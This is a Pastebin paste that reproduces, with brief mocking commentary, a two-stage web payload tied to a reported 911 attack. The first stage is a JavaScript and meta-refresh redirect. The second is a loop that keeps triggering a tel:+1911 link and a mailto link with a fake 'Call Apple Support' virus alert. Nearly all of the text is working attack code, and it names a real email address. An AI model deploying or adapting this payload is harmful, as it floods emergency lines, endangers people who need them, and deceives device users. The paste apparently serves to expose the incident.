Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!-- Maricopa County Sheriff's Office calls this a sophisticated cyber attack:
- http://www.abc15.com/news/region-phoenix-metro/central-phoenix/mcso-arrests-suspect-in-911-cyber-attack
- This is not a sophisticated cyber attack. -->
- <!-- Stage 1: payload from meetdesai.com/ipas
- this is the initial page which forwards the user to a second stage with a strange URL -->
- <script>window.googleJavaScriptRedirect=1</script>
- <script>
- var n={
- navigateTo:function(b,a,d){
- if(b!=a&&b.google){
- if(b.google.r){
- b.google.r=0;
- b.location.href=d;
- a.location.replace("about:blank");
- }
- } else {
- a.location.replace(d);
- }
- }
- };
- n.navigateTo(window.parent,window,"http://meetdesai.com/ipas/+\x26cd\x3d2\x26hl\x3den\x26ct\x3dclnk\x26gl\x3dus");
- </script>
- <noscript>
- <META http-equiv="refresh" content="0;URL='http://meetdesai.com/ipas/+&cd=2&hl=en&ct=clnk&gl=us'">
- </noscript>
- <!-- end Stage 1 -->
- <!-- Stage 2: payload from meetdesai.com/ipas/+&cd=2&hl=en&ct=clnk&gl=us
- this is the stage that either calls folks, or opens mails to desai, or both. -->
- <h1>LOLOLOLOLOLOLOL</h1>
- <a href="tel:+1911" id="tel"></a>
- <a href="mailto:meets_desai@Yahoo.com?subject=Virus Detected!&body=We detected a Virus on your device! Call Apple Support now!" id="mail"></a>
- <script>
- for(i=0;i<10100101010010101001010100101001010;++i){
- document.getElementById("tel").click(); document.getElementById("mail").click();
- window.location = window.location;
- }
- </script>
- <!-- end Stage 2 -->
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement